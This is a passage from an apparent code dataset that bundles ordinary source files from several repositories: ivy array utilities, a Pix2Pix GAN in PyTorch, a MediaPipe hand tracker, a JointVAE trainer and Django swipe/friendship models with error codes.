Raise the base by the power, with MIN_BASE added to the base when exponent > 1 for numerical stability.
:param base: The numerator of the division.
:type base: any valid numerator, including containers
:param exponent: The denominator of the division.
:type exponent: any valid denominator, including containers
:param min_base: The minimum base to use, use global ivy._MIN_BASE by default.
:type min_base: float, optional
:return: The new item following the numerically stable division.
"""
# noinspection PyProtectedMember
return (base + default(min_base, ivy._MIN_BASE)) ** exponent
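def _stable_arithmetic_example():
    # Editor's hedged usage sketch (not part of the original source): the small
    # global constants keep a zero denominator or zero base from blowing up.
    safe_ratio = stable_divide(1., 0.)  # ~ 1. / ivy._MIN_DENOMINATOR, finite
    safe_power = stable_pow(0., -2)     # ~ ivy._MIN_BASE ** -2, finite
    return safe_ratio, safe_power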
def get_all_arrays_in_memory():
"""
Gets all arrays which are currently alive.
"""
all_arrays = list()
for obj in gc.get_objects():
# noinspection PyBroadException
try:
if ivy.is_native_array(obj):
all_arrays.append(obj)
except Exception:
pass
return all_arrays
def num_arrays_in_memory():
"""
Returns the number of arrays which are currently alive.
"""
return len(get_all_arrays_in_memory())
def print_all_arrays_in_memory():
"""
Prints all arrays which are currently alive.
"""
for arr in get_all_arrays_in_memory():
print(type(arr), arr.shape)
def set_queue_timeout(timeout):
"""
Set the global queue timeout value (in seconds). The default value without calling this function is 10 seconds.
:param timeout: The timeout to set in seconds.
:type timeout: float
"""
global TIMEOUT
TIMEOUT = timeout
def queue_timeout():
"""
Get the global queue timeout value (in seconds). The default value without calling this function is 10 seconds.
"""
global TIMEOUT
return TIMEOUT
def tmp_dir():
"""
Return the directory for saving temporary files.
"""
return TMP_DIR
def set_tmp_dir(tmp_dr):
"""
Set the directory for saving temporary files.
"""
global TMP_DIR
TMP_DIR = tmp_dr
def container_types():
"""
Return all framework-specific types which should be hierarchically parsed in an ivy.Container. Such types must adopt
a key-value structure, and expose the public methods .keys(), .values() and .items().
"""
# noinspection PyBroadException
try:
return _cur_framework().container_types()
except ValueError:
return []
def inplace_arrays_supported(f=None):
"""
Determine whether inplace arrays are supported for the current backend framework.
:return: Boolean, whether or not inplace arrays are supported.
"""
return _cur_framework().inplace_arrays_supported()
def inplace_variables_supported(f=None):
"""
Determine whether inplace variables are supported for the current backend framework.
:return: Boolean, whether or not inplace variables are supported.
"""
return _cur_framework().inplace_variables_supported()
def supports_inplace(x):
"""
Determine whether inplace operations are supported for the data type of x.
:param x: Input variable or array to check for inplace support for.
:type x: variable or array
:return: Boolean, whether or not inplace operations are supported for x.
"""
if ivy.is_variable(x):
return ivy.inplace_variables_supported()
elif ivy.is_native_array(x):
return ivy.inplace_arrays_supported()
raise Exception('Input x must be either a variable or an array.')
def assert_supports_inplace(x):
"""
Asserts that inplace operations are supported for x, else raises exception.
:param x: Input variable or array to check for inplace support for.
:type x: variable or array
:return: True if support, raises exception otherwise
"""
if not ivy.supports_inplace(x):
raise Exception('Inplace operations are not supported {} types with {} backend'.format(
type(x), ivy.current_framework_str()))
return True
def inplace_update(x, val):
"""
Perform in-place update for the input array. This will always be performed on ivy.Array instances passed in the input,
and will also be performed on the native array classes in the backend, when the backend supports this.
:param x: The variable to update.
:type x: variable
:param val: The array to update the variable with.
:type val: array
:return: The array following the in-place update.
"""
return _cur_framework(x).inplace_update(x, val)
def inplace_decrement(x, val):
"""
Perform in-place decrement for the input array.
:param x: The array to decrement.
:type x: array
:param val: The array to decrement the variable with.
:type val: array
:return: The array following the in-place decrement.
"""
return _cur_framework(x).inplace_decrement(x, val)
def inplace_increment(x, val):
"""
Perform in-place increment for the input array.
:param x: The array to increment.
:type x: array
:param val: The array to increment the variable with.
:type val: array
:return: The array following the in-place increment.
"""
return _cur_framework(x).inplace_increment(x, val)
def cumsum(x: Union[ivy.Array, ivy.NativeArray], axis: int = 0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns the cumulative sum of the elements along a given axis.
:param x: Input array.
:type x: array
:param axis: Axis along which the cumulative sum is computed. By default 0.
:type axis: int
:return: Input array with cumulatively summed elements along axis.
"""
return _cur_framework(x).cumsum(x, axis)
def cumprod(x: Union[ivy.Array, ivy.NativeArray], axis: int = 0, exclusive: bool = False)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns the cumulative product of the elements along a given axis.
:param x: Input array.
:type x: array
:param axis: Axis along which the cumulative product is computed. By default 0.
:type axis: int
:param exclusive: Whether to perform the cumprod exclusively. Defaults is False.
:type exclusive: bool, optional
:return: Input array with cumulatively multiplied elements along axis.
"""
return _cur_framework(x).cumprod(x, axis, exclusive)
# noinspection PyShadowingNames
def scatter_flat(indices: Union[ivy.Array, ivy.NativeArray], updates: Union[ivy.Array, ivy.NativeArray],
size: Optional[int] = None, tensor: Optional[Union[ivy.Array, ivy.NativeArray]] = None,
reduction: str = 'sum', dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Scatter flat updates into a new flat array according to flat indices.
:param indices: Indices for the new values to occupy.
:type indices: array
:param updates: Values for the new array to hold.
:type updates: array
:param size: The size of the result.
:type size: int
:param tensor: The tensor in which to scatter the results, default is None, in which case the size is used to
scatter into a zeros array.
:param reduction: The reduction method for the scatter, one of 'sum', 'min', 'max' or 'replace'
:type reduction: str
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as updates if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values scattered at the indices.
"""
return _cur_framework(indices).scatter_flat(indices, updates, size, tensor, reduction, dev)
# noinspection PyShadowingNames
def scatter_nd(indices: Union[ivy.Array, ivy.NativeArray], updates: Union[ivy.Array, ivy.NativeArray],
shape: Optional[Iterable[int]] = None, tensor: Optional[Union[ivy.Array, ivy.NativeArray]] = None,
reduction: str = 'sum', dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Scatter updates into a new array according to indices.
:param indices: Indices for the new values to occupy.
:type indices: array
:param updates: Values for the new array to hold.
:type updates: array
:param shape: The shape of the result. Default is None, in which case tensor argument must be provided.
:type shape: sequence of ints
:param tensor: The tensor in which to scatter the results, default is None, in which case the shape arg is used to
scatter into a zeros array.
:param reduction: The reduction method for the scatter, one of 'sum', 'min', 'max' or 'replace'
:type reduction: str
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as updates if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values scattered at the indices.
"""
return _cur_framework(indices).scatter_nd(indices, updates, shape, tensor, reduction, dev)
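def _scatter_nd_example():
    # Editor's hedged usage sketch (not part of the original source); assumes a
    # backend framework has already been set globally.
    indices = ivy.array([[1], [3]])
    updates = ivy.array([9., 10.])
    # Scatters the two updates into a fresh zeros vector of length 5.
    return scatter_nd(indices, updates, shape=[5])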
# noinspection PyShadowingNames
def gather(params: Union[ivy.Array, ivy.NativeArray], indices: Union[ivy.Array, ivy.NativeArray], axis: int = -1,
dev: ivy.Device = None) -> Union[ivy.Array, ivy.NativeArray]:
"""
Gather slices from params at axis according to indices.
:param params: The array from which to gather values.
:type params: array
:param indices: Index array.
:type indices: array
:param axis: The axis from which to gather from. Default is -1.
:type axis: int, optional
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: New array with the values gathered at the specified indices along the specified axis.
"""
return _cur_framework(params).gather(params, indices, axis, dev)
# noinspection PyShadowingNames
def gather_nd(params: Union[ivy.Array, ivy.NativeArray], indices: Union[ivy.Array, ivy.NativeArray],
dev: ivy.Device = None) -> Union[ivy.Array, ivy.NativeArray]:
"""
Gather slices from params into an array with shape specified by indices.
:param params: The array from which to gather values.
:type params: array
:param indices: Index array.
:type indices: array
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: New array of given shape, with the values gathered at the indices.
"""
return _cur_framework(params).gather_nd(params, indices, dev)
def multiprocessing(context: str = None):
"""
Return framework-specific multiprocessing module.
:param context: The context of the multiprocessing, either fork, forkserver or spawn. Default is None.
:type context: str, optional
:return: Multiprocessing module
"""
return _cur_framework().multiprocessing(context)
def indices_where(x: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns indices of true elements in an input boolean array.
:param x: Boolean array, for which indices are desired.
:type x: array
:return: Indices for where the boolean array is True.
"""
return _cur_framework(x).indices_where(x)
# noinspection PyShadowingNames
def one_hot(indices: Union[ivy.Array, ivy.NativeArray], depth: int, dev: ivy.Device = None)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns a one-hot array
:param indices: Indices for where the ones should be scattered *[batch_shape, dim]*
:type indices: array
:param depth: Scalar defining the depth of the one-hot dimension.
:type depth: int
:param dev: device on which to create the array 'cuda:0', 'cuda:1', 'cpu' etc. Same as x if None.
:type dev: ivy.Device, optional
:return: One-hot array with ones at the specified indices along a new final dimension of size depth, and zeros elsewhere.
"""
return _cur_framework(indices).one_hot(indices, depth, dev)
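def _one_hot_example():
    # Editor's hedged usage sketch (not part of the original source); assumes a
    # backend framework has already been set globally.
    class_ids = ivy.array([0, 2])
    return one_hot(class_ids, 3)  # rows [1, 0, 0] and [0, 0, 1]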
def shape(x: Union[ivy.Array, ivy.NativeArray], as_array: bool = False)\
-> Iterable[int]:
"""
Returns the shape of the array x.
:param x: Input array to infer the shape of.
:type x: array
:param as_array: Whether to return the shape as an array. Default is False.
:type as_array: bool, optional
:return: Shape of the array
"""
return _cur_framework(x).shape(x, as_array)
def get_num_dims(x: Union[ivy.Array, ivy.NativeArray], as_array: bool = False) -> int:
"""
Returns the number of dimensions of the array x.
:param x: Input array to infer the number of dimensions for.
:type x: array
:param as_array: Whether to return the number of dimensions as an array. Default is False.
:type as_array: bool, optional
:return: Number of dimensions of the array
"""
return _cur_framework(x).get_num_dims(x, as_array)
``` |
{
"source": "7wikd/Pix2Pix-PyTorch",
"score": 3
} |
#### File: 7wikd/Pix2Pix-PyTorch/dataset.py
```python
import numpy as np
import config
import os
from PIL import Image
from torch.utils.data import Dataset, DataLoader
from torchvision.utils import save_image
class MyDataset(Dataset):
def __init__(self,root_dir):
self.root_dir = root_dir
self.list_files = os.listdir(self.root_dir)
def __len__(self):
return len(self.list_files)
def __getitem__(self, index):
img_file = self.list_files[index]
img_path = os.path.join(self.root_dir,img_file)
image = np.array(Image.open(img_path))
input_image = image[:,511:,:]
target_image = image[:,:511,:]
augmentations = config.both_transforms(image=input_image,image0=target_image)
input_image = augmentations["image"]
target_image = augmentations["image0"]
input_image = config.transform_input(image=input_image)["image"]
target_image = config.transform_mask(image=target_image)["image"]
return input_image,target_image
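# --- Editor's hedged usage sketch; the directory path below is an assumption ---
def _loader_example():
    dataset = MyDataset(root_dir="data/maps/train")
    loader = DataLoader(dataset, batch_size=16, shuffle=True)
    input_batch, target_batch = next(iter(loader))
    return input_batch.shape, target_batch.shape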
```
#### File: 7wikd/Pix2Pix-PyTorch/model.py
```python
import torch.nn as nn
import torch
class ConvBlock(nn.Module):
def __init__(self,in_features,out_features, use_dropout=False, isEncoder=True):
super(ConvBlock,self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_features, out_features, 4, 2, 1, bias=False, padding_mode='reflect')
if isEncoder
else nn.ConvTranspose2d(in_features, out_features, 4, 2, 1, bias=False),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2) if isEncoder else nn.ReLU(),
)
self.use_dropout = use_dropout
self.dropout = nn.Dropout(0.5)
self.isEncoder = isEncoder
def forward(self,x):
x = self.conv(x)
return self.dropout(x) if self.use_dropout else x
class Generator(nn.Module):
def __init__(self):
super().__init__()
self.e1 = nn.Sequential(
nn.Conv2d(3, 64, 4, 2, 1,padding_mode='reflect'),
nn.LeakyReLU(0.2),
)
self.e2 = ConvBlock(64, 128, isEncoder=True)
self.e3 = ConvBlock(128, 256, isEncoder=True)
self.e4 = ConvBlock(256, 512, isEncoder=True)
self.e5 = ConvBlock(512, 512, isEncoder=True)
self.e6 = ConvBlock(512, 512, isEncoder=True)
self.e7 = ConvBlock(512, 512, isEncoder=True)
self.bottleneck = nn.Sequential(
nn.Conv2d(512, 512, 4,2,1),
nn.ReLU(),
)
self.d1 = ConvBlock(512, 512, isEncoder=False, use_dropout=True)
self.d2 = ConvBlock(1024, 512, isEncoder=False, use_dropout=True)
self.d3 = ConvBlock(1024, 512, isEncoder=False, use_dropout=True)
self.d4 = ConvBlock(1024, 512, isEncoder=False)
self.d5 = ConvBlock(1024, 256, isEncoder=False)
self.d6 = ConvBlock(512, 128, isEncoder=False)
self.d7 = ConvBlock(256, 64, isEncoder=False)
self.d8 = nn.Sequential(
nn.ConvTranspose2d(128, 3, 4, 2, 1),
nn.Tanh(),
)
def forward(self,x):
down1 = self.e1(x)
down2 = self.e2(down1)
down3 = self.e3(down2)
down4 = self.e4(down3)
down5 = self.e5(down4)
down6 = self.e6(down5)
down7 = self.e7(down6)
bottleneck = self.bottleneck(down7)
up1 = self.d1(bottleneck)
up2 = self.d2(torch.cat([up1, down7], 1))
up3 = self.d3(torch.cat([up2, down6], 1))
up4 = self.d4(torch.cat([up3, down5], 1))
up5 = self.d5(torch.cat([up4, down4], 1))
up6 = self.d6(torch.cat([up5, down3], 1))
up7 = self.d7(torch.cat([up6, down2], 1))
return self.d8(torch.cat([up7, down1], 1))
class Block(nn.Module):
def __init__(self,in_features,out_features,stride):
super(Block,self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_features, out_features, 4, stride, 1,bias=False,padding_mode="reflect"),
nn.BatchNorm2d(out_features),
nn.LeakyReLU(0.2)
)
def forward(self,x):
return self.conv(x)
class Discriminator(nn.Module):
def __init__(self):
super().__init__()
self.initial = nn.Sequential(
nn.Conv2d(6, 64, 4, 2, 1, padding_mode="reflect"),
nn.LeakyReLU(0.2)
)
block1 = Block(64, 128, stride=2)
block2 = Block(128, 256, stride=2)
block3 = Block(256, 512, stride=1)
block4 = nn.Conv2d(512, 1, 4,stride=1,padding=1,padding_mode="reflect")
self.model = nn.Sequential(
block1,
block2,
block3,
block4
)
def forward(self,x,y):
x = torch.cat([x,y],1)
x = self.initial(x)
x = self.model(x)
return x
def disc_test():
x_disc = torch.randn((1, 3, 256, 256))
y_disc = torch.randn((1, 3, 256, 256))
model_disc = Discriminator()
preds_disc = model_disc(x_disc, y_disc)
print(f"====== Discriminator Model: ======= \n{model_disc}")
print(preds_disc.shape)
def gen_test():
x_gen = torch.randn((1, 3, 256, 256))
model_gen = Generator()
preds_gen = model_gen(x_gen)
print(f"====== Generator Model: ======= \n{model_gen}")
print(preds_gen.shape)
print("\n")
if __name__ == "__main__":
gen_test()
disc_test()
``` |
{
"source": "7wikd/Volume-Control",
"score": 3
} |
#### File: 7wikd/Volume-Control/handtracker_module.py
```python
import cv2
import mediapipe as mp
import time
'''
Hand Landmarks:
WRIST = 0
THUMB_CMC = 1
THUMB_MCP = 2
THUMB_IP = 3
THUMB_TIP = 4
INDEX_FINGER_MCP = 5
INDEX_FINGER_PIP = 6
INDEX_FINGER_DIP = 7
INDEX_FINGER_TIP = 8
MIDDLE_FINGER_MCP = 9
MIDDLE_FINGER_PIP = 10
MIDDLE_FINGER_DIP = 11
MIDDLE_FINGER_TIP = 12
RING_FINGER_MCP = 13
RING_FINGER_PIP = 14
RING_FINGER_DIP = 15
RING_FINGER_TIP = 16
PINKY_MCP = 17
PINKY_PIP = 18
PINKY_DIP = 19
PINKY_TIP = 20
'''
class handDetector():
def __init__(self,mode=False,maxHands=2,detectionConf=0.5,trackConf=0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionConf = detectionConf
self.trackConf = trackConf
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.detectionConf, self.trackConf)
self.mpDraw = mp.solutions.drawing_utils
def find_hands(self,img,draw = True):
imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def find_position(self,img, handnum=0, draw=True):
lmList = []
if self.results.multi_hand_landmarks:
handLms = self.results.multi_hand_landmarks[handnum]
for idx, lm in enumerate(handLms.landmark):
#print(idx,lm)
# rudimentary landmark tracker
h,w,c = img.shape
cx,cy = int(lm.x*w),int(lm.y*h)
lmList.append([idx,cx,cy])
if draw:
cv2.circle(img,(cx,cy),6,(255,0,255),cv2.FILLED)
return lmList
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0)
detector = handDetector()
while True:
success, img = cap.read()
img = detector.find_hands(img)
mylist = detector.find_position(img)
if len(mylist) != 0:
print(mylist[3])
cTime = time.time()
fps = 1/(cTime-pTime)
pTime = cTime
cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_PLAIN,3,(255,255,0),3)
cv2.imshow("Image",img)
cv2.waitKey(1)
if __name__ == "__main__":
main()
``` |
{
"source": "7wik/joint-vae",
"score": 3
} |
#### File: joint-vae/jointvae/training.py
```python
import imageio
import numpy as np
import torch
from torch.nn import functional as F
from torchvision.utils import make_grid
EPS = 1e-12
class Trainer():
def __init__(self, model, optimizer, cont_capacity=None,
disc_capacity=None, print_loss_every=50, record_loss_every=5,
use_cuda=False):
"""
Class to handle training of model.
Parameters
----------
model : jointvae.models.VAE instance
optimizer : torch.optim.Optimizer instance
cont_capacity : tuple (float, float, int, float) or None
Tuple containing (min_capacity, max_capacity, num_iters, gamma_z).
Parameters to control the capacity of the continuous latent
channels. Cannot be None if model.is_continuous is True.
disc_capacity : tuple (float, float, int, float) or None
Tuple containing (min_capacity, max_capacity, num_iters, gamma_c).
Parameters to control the capacity of the discrete latent channels.
Cannot be None if model.is_discrete is True.
print_loss_every : int
Frequency with which loss is printed during training.
record_loss_every : int
Frequency with which loss is recorded during training.
use_cuda : bool
If True moves model and training to GPU.
"""
self.model = model
self.optimizer = optimizer
self.cont_capacity = cont_capacity
self.disc_capacity = disc_capacity
self.print_loss_every = print_loss_every
self.record_loss_every = record_loss_every
self.use_cuda = use_cuda
if self.model.is_continuous and self.cont_capacity is None:
raise RuntimeError("Model is continuous but cont_capacity not provided.")
if self.model.is_discrete and self.disc_capacity is None:
raise RuntimeError("Model is discrete but disc_capacity not provided.")
if self.use_cuda:
self.model.cuda()
# Initialize attributes
self.num_steps = 0
self.batch_size = None
self.losses = {'loss': [],
'recon_loss': [],
'kl_loss': []}
# Keep track of divergence values for each latent variable
if self.model.is_continuous:
self.losses['kl_loss_cont'] = []
# For every dimension of continuous latent variables
for i in range(self.model.latent_spec['cont']):
self.losses['kl_loss_cont_' + str(i)] = []
if self.model.is_discrete:
self.losses['kl_loss_disc'] = []
# For every discrete latent variable
for i in range(len(self.model.latent_spec['disc'])):
self.losses['kl_loss_disc_' + str(i)] = []
def train(self, data_loader, epochs=10, save_training_gif=None):
"""
Trains the model.
Parameters
----------
data_loader : torch.utils.data.DataLoader
epochs : int
Number of epochs to train the model for.
save_training_gif : None or tuple (string, Visualizer instance)
If not None, will use visualizer object to create image of samples
after every epoch and will save gif of these at location specified
by string. Note that string should end with '.gif'.
"""
if save_training_gif is not None:
training_progress_images = []
self.batch_size = data_loader.batch_size
self.model.train()
for epoch in range(epochs):
mean_epoch_loss = self._train_epoch(data_loader)
print('Epoch: {} Average loss: {:.2f}'.format(epoch + 1,
self.batch_size * self.model.num_pixels * mean_epoch_loss))
if save_training_gif is not None:
# Generate batch of images and convert to grid
viz = save_training_gif[1]
viz.save_images = False
img_grid = viz.all_latent_traversals(size=10)
# Convert to numpy and transpose axes to fit imageio convention
# i.e. (width, height, channels)
img_grid = np.transpose(img_grid.numpy(), (1, 2, 0))
# Add image grid to training progress
training_progress_images.append(img_grid)
if save_training_gif is not None:
imageio.mimsave(save_training_gif[0], training_progress_images,
fps=24)
def _train_epoch(self, data_loader):
"""
Trains the model for one epoch.
Parameters
----------
data_loader : torch.utils.data.DataLoader
"""
epoch_loss = 0.
print_every_loss = 0. # Keeps track of loss to print every
# self.print_loss_every
for batch_idx, (data, label) in enumerate(data_loader):
iter_loss = self._train_iteration(data)
epoch_loss += iter_loss
print_every_loss += iter_loss
# Print loss info every self.print_loss_every iteration
if batch_idx % self.print_loss_every == 0:
if batch_idx == 0:
mean_loss = print_every_loss
else:
mean_loss = print_every_loss / self.print_loss_every
print('{}/{}\tLoss: {:.3f}'.format(batch_idx * len(data),
len(data_loader.dataset),
self.model.num_pixels * mean_loss))
print_every_loss = 0.
# Return mean epoch loss
return epoch_loss / len(data_loader.dataset)
def _train_iteration(self, data):
"""
Trains the model for one iteration on a batch of data.
Parameters
----------
data : torch.Tensor
A batch of data. Shape (N, C, H, W)
"""
self.num_steps += 1
if self.use_cuda:
data = data.cuda()
self.optimizer.zero_grad()
recon_batch, latent_dist = self.model(data)
loss = self._loss_function(data, recon_batch, latent_dist)
loss.backward()
self.optimizer.step()
train_loss = loss.item()
return train_loss
def _loss_function(self, data, recon_data, latent_dist):
"""
Calculates loss for a batch of data.
Parameters
----------
data : torch.Tensor
Input data (e.g. batch of images). Should have shape (N, C, H, W)
recon_data : torch.Tensor
Reconstructed data. Should have shape (N, C, H, W)
latent_dist : dict
Dict with keys 'cont' or 'disc' or both containing the parameters
of the latent distributions as values.
"""
# Reconstruction loss is pixel wise cross-entropy
recon_loss = F.binary_cross_entropy(recon_data.view(-1, self.model.num_pixels),
data.view(-1, self.model.num_pixels))
# F.binary_cross_entropy takes mean over pixels, so unnormalise this
recon_loss *= self.model.num_pixels
# Calculate KL divergences
kl_cont_loss = 0 # Used to compute capacity loss (but not a loss in itself)
kl_disc_loss = 0 # Used to compute capacity loss (but not a loss in itself)
cont_capacity_loss = 0
disc_capacity_loss = 0
if self.model.is_continuous:
# Calculate KL divergence
mean, logvar = latent_dist['cont']
kl_cont_loss = self._kl_normal_loss(mean, logvar)
# Linearly increase capacity of continuous channels
cont_min, cont_max, cont_num_iters, cont_gamma = \
self.cont_capacity
# Increase continuous capacity without exceeding cont_max
cont_cap_current = (cont_max - cont_min) * self.num_steps / float(cont_num_iters) + cont_min
cont_cap_current = min(cont_cap_current, cont_max)
# Calculate continuous capacity loss
cont_capacity_loss = cont_gamma * torch.abs(cont_cap_current - kl_cont_loss)
if self.model.is_discrete:
# Calculate KL divergence
kl_disc_loss = self._kl_multiple_discrete_loss(latent_dist['disc'])
# Linearly increase capacity of discrete channels
disc_min, disc_max, disc_num_iters, disc_gamma = \
self.disc_capacity
# Increase discrete capacity without exceeding disc_max or theoretical
# maximum (i.e. sum of log of dimension of each discrete variable)
disc_cap_current = (disc_max - disc_min) * self.num_steps / float(disc_num_iters) + disc_min
disc_cap_current = min(disc_cap_current, disc_max)
# Require float conversion here to not end up with numpy float
disc_theoretical_max = sum([float(np.log(disc_dim)) for disc_dim in self.model.latent_spec['disc']])
disc_cap_current = min(disc_cap_current, disc_theoretical_max)
# Calculate discrete capacity loss
disc_capacity_loss = disc_gamma * torch.abs(disc_cap_current - kl_disc_loss)
# Calculate total kl value to record it
kl_loss = kl_cont_loss + kl_disc_loss
# Calculate total loss
total_loss = recon_loss + cont_capacity_loss + disc_capacity_loss
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['recon_loss'].append(recon_loss.item())
self.losses['kl_loss'].append(kl_loss.item())
self.losses['loss'].append(total_loss.item())
# To avoid large losses normalise by number of pixels
return total_loss / self.model.num_pixels
def _kl_normal_loss(self, mean, logvar):
"""
Calculates the KL divergence between a normal distribution with
diagonal covariance and a unit normal distribution.
Parameters
----------
mean : torch.Tensor
Mean of the normal distribution. Shape (N, D) where D is dimension
of distribution.
logvar : torch.Tensor
Diagonal log variance of the normal distribution. Shape (N, D)
"""
# Calculate KL divergence
kl_values = -0.5 * (1 + logvar - mean.pow(2) - logvar.exp())
# Mean KL divergence across batch for each latent variable
kl_means = torch.mean(kl_values, dim=0)
# KL loss is sum of mean KL of each latent variable
kl_loss = torch.sum(kl_means)
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['kl_loss_cont'].append(kl_loss.item())
for i in range(self.model.latent_spec['cont']):
self.losses['kl_loss_cont_' + str(i)].append(kl_means[i].item())
return kl_loss
def _kl_multiple_discrete_loss(self, alphas):
"""
Calculates the KL divergence between a set of categorical distributions
and a set of uniform categorical distributions.
Parameters
----------
alphas : list
List of the alpha parameters of a categorical (or gumbel-softmax)
distribution. For example, if the categorical latent distribution of
the model has dimensions [2, 5, 10] then alphas will contain 3
torch.Tensor instances with the parameters for each of
the distributions. Each of these will have shape (N, D).
"""
# Calculate kl losses for each discrete latent
kl_losses = [self._kl_discrete_loss(alpha) for alpha in alphas]
# Total loss is sum of kl loss for each discrete latent
kl_loss = torch.sum(torch.cat(kl_losses))
# Record losses
if self.model.training and self.num_steps % self.record_loss_every == 1:
self.losses['kl_loss_disc'].append(kl_loss.item())
for i in range(len(alphas)):
self.losses['kl_loss_disc_' + str(i)].append(kl_losses[i].item())
return kl_loss
def _kl_discrete_loss(self, alpha):
"""
Calculates the KL divergence between a categorical distribution and a
uniform categorical distribution.
Parameters
----------
alpha : torch.Tensor
Parameters of the categorical or gumbel-softmax distribution.
Shape (N, D)
"""
disc_dim = int(alpha.size()[-1])
log_dim = torch.Tensor([np.log(disc_dim)])
if self.use_cuda:
log_dim = log_dim.cuda()
# Calculate negative entropy of each row
neg_entropy = torch.sum(alpha * torch.log(alpha + EPS), dim=1)
# Take mean of negative entropy across batch
mean_neg_entropy = torch.mean(neg_entropy, dim=0)
# KL loss of alpha with uniform categorical variable
kl_loss = log_dim + mean_neg_entropy
return kl_loss
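def example_training_run(model, data_loader):
    # Editor's hedged usage sketch (not part of the original repo): the capacity
    # tuples are illustrative (min, max, num_iters, gamma) values only.
    optimizer = torch.optim.Adam(model.parameters(), lr=5e-4)
    trainer = Trainer(model, optimizer,
                      cont_capacity=(0.0, 5.0, 25000, 30.0),
                      disc_capacity=(0.0, 5.0, 25000, 30.0),
                      use_cuda=torch.cuda.is_available())
    trainer.train(data_loader, epochs=30)
    return trainer.losses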
``` |
{
"source": "7workday/TT",
"score": 3
} |
#### File: TT/common/stat.py
```python
OK = 0
class LogicErr(Exception):
code = None
data = None
def __init__(self,data=None):
self.data = data or self.__class__.__name__ # if data is None, use the class name as the data value
def gen_logic_err(name, code):
'''Generate a new subclass of LogicErr (a factory function for LogicErr)'''
return type(name, (LogicErr,), {'code': code})
SmsErr = gen_logic_err('SmsErr', 1000) # SMS sending failed
VcodeErr = gen_logic_err('VcodeErr', 1001) # verification code error
LoginRequired = gen_logic_err('LoginRequired', 1002) # user not logged in
UserFormErr = gen_logic_err('UserFormErr', 1003) # user form data error
ProfileFormErr = gen_logic_err('ProfileFormErr', 1004) # user profile form error
RepeatSwipeErr = gen_logic_err('RepeatSwipeErr', 1005) # duplicate swipe error
AreadyFriends = gen_logic_err('AreadyFriends',1006) # already friends (duplicate friendship)
RewindLimited = gen_logic_err('RewindLimited',1007) # daily rewind limit reached
RewindTimeout = gen_logic_err('RewindTimeout',1008) # rewind timed out
PermRequired = gen_logic_err('PermRequired',1009) # missing a required permission
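# --- Editor's hedged usage sketch; this handler is an assumption, not part of the app ---
def example_check_vcode(submitted_vcode, cached_vcode):
    '''Raise a structured logic error so an outer wrapper can serialise
    err.code / err.data into the API response.'''
    if submitted_vcode != cached_vcode:
        raise VcodeErr()
    return OK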
```
#### File: TT/social/models.py
```python
from django.db import models
from django.db.models import Q
from django.db import IntegrityError
from common import stat
class Swiped(models.Model):
'''Swipe record'''
STYPES = (
('like', 'right swipe'),
('superlike', 'up swipe'),
('dislike', 'left swipe'),
)
uid = models.IntegerField(verbose_name='user ID')
sid = models.IntegerField(verbose_name='ID of the swiped user')
stype = models.CharField(max_length=10, choices=STYPES, verbose_name='swipe type')
stime = models.DateTimeField(auto_now_add=True, verbose_name='swipe time')
class Meta:
unique_together = ('uid', 'sid') # uid and sid are unique together
@classmethod
def swiper(cls, uid, sid, stype):
'''Perform one swipe'''
try:
return cls.objects.create(uid=uid, sid=sid, stype=stype)
except IntegrityError:
raise stat.RepeatSwipeErr
@classmethod
def has_liked(cls, uid, sid):
'''Check whether uid has already liked (or superliked) sid'''
return cls.objects.filter(uid=uid, sid=sid , stype__in=['like','superlike']).exists()
class Friend(models.Model):
'''Friendship table'''
uid1 = models.IntegerField(verbose_name='user ID')
uid2 = models.IntegerField(verbose_name='user ID')
class Meta:
unique_together = ('uid1', 'uid2') # uid1 and uid2 are unique together
@classmethod
def make_friends(cls, uid1, uid2):
'''Create a friendship between two users'''
# normalize the order of uid1 and uid2: the smaller value goes first
uid1,uid2 = (uid2,uid1)if uid1>uid2 else (uid1,uid2)
try:
return cls.objects.create(uid1=uid1,uid2=uid2)
except IntegrityError:
raise stat.AreadyFriends
@classmethod
def break_off(cls,uid1,uid2):
'''Break off the friendship'''
# normalize the order of uid1 and uid2: the smaller value goes first
uid1, uid2 = (uid2, uid1) if uid1 > uid2 else (uid1, uid2)
cls.objects.filter(uid1=uid1,uid2=uid2).delete()
@classmethod
def get_my_friends_id(cls, uid):
'''Get the ID list of the user's own friends'''
query_condition = Q(uid1=uid) | Q(uid2=uid)
friendship = cls.objects.filter(query_condition)
# collect the UIDs of all friends
friend_id_list = []
for f_obj in friendship:
if f_obj.uid1 == uid:
friend_id_list.append(f_obj.uid2)
else:
friend_id_list.append(f_obj.uid1)
return friend_id_list
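# --- Editor's hedged usage sketch; this helper is an assumption, not part of the app ---
def example_like(uid, sid):
    '''Record a right swipe and, if the other user already liked back,
    promote the pair to friends.'''
    Swiped.swiper(uid, sid, 'like')
    if Swiped.has_liked(sid, uid):
        Friend.make_friends(uid, sid)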
``` |
{
